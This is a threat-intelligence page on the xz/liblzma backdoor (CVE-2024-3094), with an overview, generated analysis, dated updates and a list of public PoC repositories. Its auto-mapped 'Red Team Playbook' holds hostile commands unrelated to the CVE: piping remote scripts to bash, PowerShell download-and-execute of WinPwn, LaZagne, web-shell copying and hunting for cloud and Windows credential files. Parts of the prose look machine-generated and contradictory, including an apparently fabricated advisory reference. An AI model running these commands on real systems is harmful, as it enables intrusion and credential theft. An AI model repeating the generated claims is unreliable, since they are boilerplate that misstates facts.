CVE-2024-3094
Overview
This vulnerability is a supply chain compromise involving malicious code insertion within the liblzma component of the xz compression library. The root cause is the inclusion of a prebuilt object file embedded in a disguised test file within the source tarballs starting from version 5.6.0. During the build process, this object file is extracted and linked into the liblzma library, altering its internal functions through code injection.
Vulnerability Description
Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
Impact
An attacker controlling the source tarballs can cause any software linked against the compromised liblzma library to execute altered code, enabling interception and modification of data handled by the library. This occurs without requiring user interaction, authentication, or privileges, as the malicious code is embedded in the build artifact itself (CVSS vector AV:N/AC:L/PR:N/UI:N). The impact includes potential full compromise of confidentiality, integrity, and availability of data processed through liblzma-dependent applications, enabling stealthy data manipulation or exfiltration.
Solution
Users should upgrade to versions of xz later than 5.6.1 where the malicious code has been removed. Refer to Red Hat Security Advisory RHSA-2024:3094 for detailed patch instructions and verification steps. The advisory and linked bugzilla report provide guidance on identifying affected packages and applying vendor-provided fixes. It is critical to source xz tarballs only from trusted repositories and verify integrity before building.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the xz compression utility, specifically within the liblzma library, stems from the presence of malicious code embedded in the source code tarballs starting from version 5.6.0. This malicious code is cleverly concealed through a series of obfuscations, allowing it to extract a prebuilt object file from a disguised test file during the build process. The extracted object file is then used to alter specific functions within the liblzma code, effectively creating a compromised version of the library. This manipulation enables attackers to intercept and modify data interactions with any software that links against the compromised liblzma library, posing a significant risk to the integrity and confidentiality of data processed by affected applications.
Attack vectors for this vulnerability are multifaceted and can be exploited in various scenarios. An attacker could leverage the compromised library to execute arbitrary code within the context of applications that utilize liblzma for data compression and decompression tasks. For instance, a malicious actor could craft a payload that exploits the modified functions to exfiltrate sensitive information or inject further malicious code into the application’s workflow. Additionally, since the library is often used in a wide range of software applications, including those in critical infrastructure and enterprise environments, the potential for widespread exploitation is significant. The obfuscation techniques used to hide the malicious code complicate detection efforts, allowing attackers to maintain persistence and evade traditional security measures.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on the xz utility and its associated libraries for data processing. The business risks include potential data breaches, loss of intellectual property, and damage to reputation. Organizations could face regulatory penalties if sensitive data is compromised, particularly in sectors governed by strict data protection laws. Furthermore, the exploitation of this vulnerability could lead to operational disruptions, as compromised systems may require extensive remediation efforts, including the identification and removal of the malicious code, rebuilding affected applications, and implementing enhanced security measures to prevent future incidents.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-layered security approach. Regularly auditing and monitoring the integrity of software libraries and dependencies is crucial. Implementing code signing and verification processes can help ensure that only trusted versions of libraries are used in production environments. Additionally, organizations should establish a robust patch management policy to ensure that any updates or fixes released by the maintainers of the xz utility are promptly applied. Employing intrusion detection systems (IDS) and employing behavior-based anomaly detection can further enhance an organization’s ability to identify and respond to potential exploitation attempts.
In conclusion, the vulnerability within the xz compression utility represents a critical threat that can have severe implications for data integrity and security. The sophisticated nature of the attack vector, combined with the potential for widespread exploitation, necessitates immediate attention from organizations utilizing the affected library. By implementing proactive detection and mitigation strategies, organizations can better safeguard their systems against this and similar vulnerabilities, ultimately enhancing their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-3094, accompanied by the emergence of multiple new proof-of-concept exploits circulating within the threat actor community. Our telemetry indicates that adversaries are increasingly leveraging sophisticated tooling to automate and scale attacks against the compromised liblzma library, amplifying the potential for widespread impact. Although the EPSS score remains high with a slight downward adjustment, the overall risk posture has intensified due to the expanded exploit landscape and the accelerated pace of detection activity. This evolution underscores a growing operational maturity among threat actors exploiting this vulnerability, elevating the urgency for defenders to maintain heightened vigilance. The convergence of advanced exploitation techniques and increased attack volume significantly raises the likelihood of successful compromise in environments utilizing the affected xz compression utility.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-3094, reflected by a notable surge in telemetry signals indicating exploitation attempts. This increase corresponds with a slight uptick in the EPSS score, reinforcing the vulnerability’s persistent attractiveness to threat actors. Concurrently, new proof-of-concept repositories have appeared, providing more accessible frameworks for adversaries to develop and refine exploits targeting the compromised liblzma library. The evolving exploit landscape suggests growing operational sophistication and a broader dissemination of attack tools within underground communities. For defenders, this heightened activity signals an increased probability of encountering active exploitation attempts in environments utilizing the affected xz compression utility. Consequently, the threat level has intensified from critical to an elevated critical state, underscoring the urgency for continuous monitoring and rapid response capabilities to mitigate potential impact.
Update 3 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-3094, with our telemetry indicating a modest rise in exploit attempts targeting the compromised liblzma library. Concurrently, the exploit landscape has expanded with the release of additional publicly available proof-of-concept tools, enhancing adversaries’ capabilities to identify and leverage this vulnerability. While the EPSS score remains stable, the proliferation of automated detection and remediation utilities in underground repositories suggests growing operational maturity among threat actors. This incremental uptick in exploitation attempts, coupled with more accessible tooling, elevates the risk of widespread compromise in environments utilizing vulnerable versions of the xz-utils library. Consequently, the threat level should be considered heightened within the critical range, emphasizing the need for vigilant monitoring to detect emerging exploitation patterns promptly.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tukaani | Xz | 5.6.0 |
cpe:2.3:a:tukaani:xz:5.6.0:*:*:*:*:*:*:*
|
|
|
Tukaani | Xz | 5.6.1 |
cpe:2.3:a:tukaani:xz:5.6.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (83)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
amlweems/xzbot
notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)
|
amlweems | 3557 | 235 | 2024-04-01 | View |
|
lockness-Ko/xz-vulnerable-honeypot
An ssh honeypot with the XZ backdoor. CVE-2024-3094
|
lockness-Ko | 147 | 19 | 2024-03-30 | View |
|
FabioBaroni/CVE-2024-3094-checker
Quick and dirty PoC for checking whether a vulnerable version of xz-utils is installed (CVE-2024-3094)
|
FabioBaroni | 72 | 12 | 2024-03-29 | View |
|
byinarie/CVE-2024-3094-info
Information for CVE-2024-3094
|
byinarie | 54 | 9 | 2024-03-29 | View |
|
robertdfrench/ifuncd-up
GNU IFUNC is the real culprit behind CVE-2024-3094
|
robertdfrench | 59 | 1 | 2024-07-05 | View |
|
jfrog/cve-2024-3094-tools
|
jfrog | 45 | 7 | 2024-03-31 | View |
|
gensecaihq/CVE-2024-3094-Vulnerability-Checker-Fixer
Shell scripts to identify and fix installations of xz-utils affected by the CVE-2024-3094 vulnerability. Versions 5.6.0 ...
|
gensecaihq | 26 | 6 | 2024-03-30 | View |
|
0xlane/xz-cve-2024-3094
XZ Backdoor Extract(Test on Ubuntu 23.10)
|
0xlane | 17 | 4 | 2024-04-01 | View |
|
r0binak/xzk8s
Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094
|
r0binak | 14 | 3 | 2024-04-02 | View |
|
emirkmo/xz-backdoor-github
History of commits related to the xz backdoor Discovered On March 29, 2024: CVE-2024-3094.
|
emirkmo | 10 | 2 | 2024-03-30 | View |
|
teyhouse/CVE-2024-3094
K8S and Docker Vulnerability Check for CVE-2024-3094
|
teyhouse | 11 | 0 | 2024-03-30 | View |
|
HackerHermanos/CVE-2024-3094_xz_check
This repository contains a Bash script and a one-liner command to verify if a system is running a vulnerable version of ...
|
HackerHermanos | 8 | 0 | 2024-03-29 | View |
|
badsectorlabs/ludus_xz_backdoor
An Ansible Role that installs the xz backdoor (CVE-2024-3094) on a Debian host and optionally installs the xzbot tool.
|
badsectorlabs | 6 | 1 | 2024-04-05 | View |
|
wgetnz/CVE-2024-3094-check
|
wgetnz | 5 | 1 | 2024-03-30 | View |
|
neuralinhibitor/xzwhy
XZ Utils CVE-2024-3094 POC for Kubernetes
|
neuralinhibitor | 5 | 0 | 2024-04-18 | View |
|
KaminaDuck/ansible-CVE-2024-3094
Ansible playbooks designed to check and remediate CVE-2024-3094 (XZ Backdoor)
|
KaminaDuck | 4 | 1 | 2024-04-04 | View |
|
jbnetwork-git/CVE-2024-3094-XZ-Utils-Check
Herramientas de linux para diferentes funciones.
|
jbnetwork-git | 3 | 1 | 2024-04-01 | View |
|
gustavorobertux/CVE-2024-3094
Checker - CVE-2024-3094
|
gustavorobertux | 3 | 1 | 2024-04-01 | View |
|
lypd0/CVE-2024-3094-Vulnerabity-Checker
Verify that your XZ Utils version is not vulnerable to CVE-2024-3094
|
lypd0 | 4 | 0 | 2024-03-29 | View |
|
Yuma-Tsushima07/CVE-2024-3094
A script to detect if xz is vulnerable - CVE-2024-3094
|
Yuma-Tsushima07 | 4 | 0 | 2024-03-31 | View |
|
ScrimForever/CVE-2024-3094
Detectar CVE-2024-3094
|
ScrimForever | 2 | 1 | 2024-04-02 | View |
|
pentestfunctions/CVE-2024-3094
CVE-2024-3094 - Checker (fix for arch etc)
|
pentestfunctions | 3 | 0 | 2024-04-02 | View |
|
przemoc/xz-backdoor-links
apocalypxze: xz backdoor (2024) AKA CVE-2024-3094 related links
|
przemoc | 3 | 0 | 2024-04-02 | View |
|
felipecosta09/cve-2024-3094
A tutorial on how to detect the CVE 2024-3094
|
felipecosta09 | 3 | 0 | 2024-04-04 | View |
|
nnatsopoulos/xz-backdoor-research
CVE-2024-3094 XZ Utils backdoor research - attack surface visualiser, system vulnerability checker, and general Linux CV...
|
nnatsopoulos | 1 | 1 | 2026-06-14 | View |
|
Security-Phoenix-demo/CVE-2024-3094-fix-exploits
Collection of Detection, Fix, and exploit for CVE-2024-3094
|
Security-Phoenix-demo | 2 | 0 | 2024-04-03 | View |
|
DANO-AMP/CVE-2024-3094
SSH EXPLOIT BYPASS AUTH SSH
|
DANO-AMP | 2 | 0 | 2024-07-05 | View |
|
valeriot30/cve-2024-3094
A XZ backdoor vulnerability explained in details
|
valeriot30 | 1 | 1 | 2025-06-03 | View |
|
24Owais/threat-intel-cve-2024-3094
Threat intelligence report analyzing the xz-utils backdoor vulnerability (CVE-2024-3094)
|
24Owais | 1 | 1 | 2025-06-19 | View |
|
Horizon-Software-Development/CVE-2024-3094
|
Horizon-Software-Development | 2 | 0 | 2024-03-30 | View |
|
Bella-Bc/xz-backdoor-CVE-2024-3094-Check
Verify if your installed version of xz-utils is vulnerable to CVE-2024-3094 backdoor
|
Bella-Bc | 2 | 0 | 2024-04-03 | View |
|
brinhosa/CVE-2024-3094-One-Liner
|
brinhosa | 1 | 0 | 2024-03-30 | View |
|
galacticquest/cve-2024-3094-detect
|
galacticquest | 1 | 0 | 2024-04-01 | View |
|
robertdebock/ansible-playbook-cve-2024-3094
A small repo with a single playbook.
|
robertdebock | 1 | 0 | 2024-04-04 | View |
|
mrk336/CVE-2024-3094
CVE-2024-3094 exposed a backdoor in the XZ compression library, allowing remote SSH access by bypassing authentication. ...
|
mrk336 | 1 | 0 | 2025-09-12 | View |
|
M1lo25/CS50FinalProject
Investigation into the XZ Utils backdoor (CVE-2024-3094): chronology, attack chain, risk to SSH, and supply-chain insigh...
|
M1lo25 | 1 | 0 | 2025-10-16 | View |
|
iheb2b/CVE-2024-3094-Checker
The CVE-2024-3094 Checker is a Bash tool for identifying if Linux systems are at risk from the CVE-2024-3094 flaw in XZ/...
|
iheb2b | 1 | 0 | 2024-04-03 | View |
|
Ikram124/CVE-2024-3094-analysis
Security analysis project: Real-world CVE breakdown
|
Ikram124 | 1 | 0 | 2025-06-27 | View |
|
hackingetico21/revisaxzutils
Script en bash para revisar si tienes la vulnerabilidad CVE-2024-3094.
|
hackingetico21 | 0 | 1 | 2024-04-02 | View |
|
devjanger/CVE-2024-3094-XZ-Backdoor-Detector
CVE-2024-3094 XZ Backdoor Detector
|
devjanger | 0 | 1 | 2024-04-02 | View |
|
harekrishnarai/xz-utils-vuln-checker
Checker for CVE-2024-3094 where malicious code was discovered in the upstream tarballs of xz, starting with version 5.6....
|
harekrishnarai | 1 | 0 | 2024-03-30 | View |
|
Bryn018/Semantic-Backdoor-Detector
GNN-based supply chain backdoor detector for Python packages. Uses Code Property Graphs + 3-layer GCN to detect obfuscat...
|
Bryn018 | 0 | 0 | 2026-06-22 | View |
|
stevehenderson/lab_xz_backdoor
Some labs looking at the xz backdoor vulnerability (CVE-2024-3094)
|
stevehenderson | 0 | 0 | 2026-06-13 | View |
|
vesjolyjd/Kaspersky_CVE-2024-3094
|
vesjolyjd | 0 | 0 | 2026-04-30 | View |
|
0xBlackash/CVE-2024-3094
CVE-2024-3094
|
0xBlackash | 0 | 0 | 2026-04-23 | View |
|
vnchk1/sec_review_cve-2024-3094
Security review уязвимости CVE-2024-3094 с открытым исходным кодом
|
vnchk1 | 0 | 0 | 2026-04-08 | View |
|
Ava-Vispilio/CVE-2024-3094
|
Ava-Vispilio | 0 | 0 | 2026-04-15 | View |
|
h3raklez/CVE-2024-3094
CVE-2024-3094 - XZ Utils Backdoor
|
h3raklez | 0 | 0 | 2026-04-09 | View |
|
OpensourceICTSolutions/xz_utils-CVE-2024-3094
|
OpensourceICTSolutions | 0 | 0 | 2024-03-29 | View |
|
bioless/xz_cve-2024-3094_detection
Script to detect CVE-2024-3094.
|
bioless | 0 | 0 | 2024-03-29 | View |
|
Fractal-Tess/CVE-2024-3094
|
Fractal-Tess | 0 | 0 | 2024-03-29 | View |
|
mightysai1997/CVE-2024-3094
|
mightysai1997 | 0 | 0 | 2024-04-01 | View |
|
fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
La siguiente regla YARA ayuda a detectar la presencia del backdoor en la librería liblzma comprometida en sistemas que u...
|
fevar54 | 0 | 0 | 2024-04-13 | View |
|
AndreaCicca/Sicurezza-Informatica-Presentazione
Presentazione per il corsi di sicurezza Informatica sulla vulnerabilità CVE-2024-3094
|
AndreaCicca | 0 | 0 | 2024-05-22 | View |
|
Titus-soc/-CVE-2024-3094-Vulnerability-Checker-Fixer-Public
A lightweight utility designed to detect and remediate systems affected by CVE-2024-3094, a critical vulnerability impac...
|
Titus-soc | 0 | 0 | 2025-09-20 | View |
|
ThomRgn/xzutils_backdoor_obfuscation
Script to obfuscate a payload the same way as it was done by the XZ utils attack (CVE-2024-3094)
|
ThomRgn | 0 | 0 | 2025-10-22 | View |
|
ElinaNotElina/cve-2024-3094-analysis
|
ElinaNotElina | 0 | 0 | 2026-04-04 | View |
|
ashwani95/CVE-2024-3094
|
ashwani95 | 0 | 0 | 2024-03-30 | View |
|
encikayelwhitehat-glitch/CVE-2024-3094
|
encikayelwhitehat-glitch | 0 | 0 | 2026-01-14 | View |
|
michalAshurov/writeup-CVE-2024-3094
|
michalAshurov | 0 | 0 | 2026-03-11 | View |
|
extracoding-dozen/CVE-2024-3094
Research of CVE-2024-3094 vulnerability.
|
extracoding-dozen | 0 | 0 | 2026-03-13 | View |
|
hazemkya/CVE-2024-3094-checker
|
hazemkya | 0 | 0 | 2024-03-30 | View |
|
mightysai1997/CVE-2024-3094-info
|
mightysai1997 | 0 | 0 | 2024-04-01 | View |
|
zpxlz/CVE-2024-3094
Obsidian notes about CVE-2024-3094
|
zpxlz | 0 | 0 | 2024-04-01 | View |
|
been22426/CVE-2024-3094
CVE-2024-3094 실습 환경 구축 및 보고
|
been22426 | 0 | 0 | 2025-04-16 | View |
|
mesutgungor/xz-backdoor-vulnerability
CVE-2024-3094
|
mesutgungor | 0 | 0 | 2024-04-01 | View |
|
isuruwa/CVE-2024-3094
CVE-2024-3094
|
isuruwa | 0 | 0 | 2024-03-31 | View |
|
Simplifi-ED/CVE-2024-3094-patcher
Ansible playbook for patching CVE-2024-3094
|
Simplifi-ED | 0 | 0 | 2024-03-31 | View |
|
ackemed/detectar_cve-2024-3094
|
ackemed | 0 | 0 | 2024-04-01 | View |
|
dah4k/CVE-2024-3094
|
dah4k | 0 | 0 | 2024-04-01 | View |
|
shefirot/CVE-2024-3094
Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster
|
shefirot | 0 | 0 | 2024-06-11 | View |
|
TheTorjanCaptain/CVE-2024-3094-Checker
The repository consists of a checker file that confirms if your xz version and xz-utils package is vulnerable to CVE-202...
|
TheTorjanCaptain | 0 | 0 | 2024-04-03 | View |
|
weltregie/liblzma-scan
Scans liblzma from xu-utils for backdoor (CVE-2024-3094)
|
weltregie | 0 | 0 | 2024-04-04 | View |
|
Juul/xz-backdoor-scan
Scan for files containing the signature from the `xz` backdoor (CVE-2024-3094)
|
Juul | 0 | 0 | 2024-04-06 | View |
|
hackura/xz-cve-2024-3094
Python demo simulating CVE-2024-3094: a supply chain backdoor in XZ Utils with a trigger-based stealth activation.
|
hackura | 0 | 0 | 2026-01-25 | View |
|
spidygal/CVE-2024-3094-Nmap-NSE-script
|
spidygal | 0 | 0 | 2024-03-31 | View |
|
MrBUGLF/XZ-Utils_CVE-2024-3094
XZ-Utils工具库恶意后门植入漏洞(CVE-2024-3094)
|
MrBUGLF | 0 | 0 | 2024-04-01 | View |
|
MagpieRYL/CVE-2024-3094-backdoor-env-container
This is a container environment running CVE-2024-3094 sshd backdoor instance, working with https://github.com/amlweems/x...
|
MagpieRYL | 0 | 0 | 2024-04-03 | View |
|
laxmikumari615/Linux---Security---Detect-and-Mitigate-CVE-2024-3094
It was determined that malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. # I...
|
laxmikumari615 | 0 | 0 | 2025-05-20 | View |
|
Dermot-lab/TryHack
CVE-2024-3094
|
Dermot-lab | 0 | 0 | 2025-06-21 | View |
|
hariskhalil555000-sketch/What-utility-does-CVE-2024-3094-refer-to-
|
hariskhalil555000-sketch | 0 | 0 | 2025-12-28 | View |
|
BOSE122/CVE-2024-3094
|
BOSE122 | 0 | 0 | 2026-01-15 | View |
|
Mustafa1986/CVE-2024-3094
|
Mustafa1986 | 0 | 0 | 2024-03-31 | View |
Threat Feed
25 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-442 | Infected Software |
33%
|
Medium | High | |
| CAPEC-636 | Hiding Malicious Data or Code within Files |
33%
|
— | High | |
| CAPEC-448 | Embed Virus into DLL |
30%
|
Medium | High |
Red Team Playbook
45 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.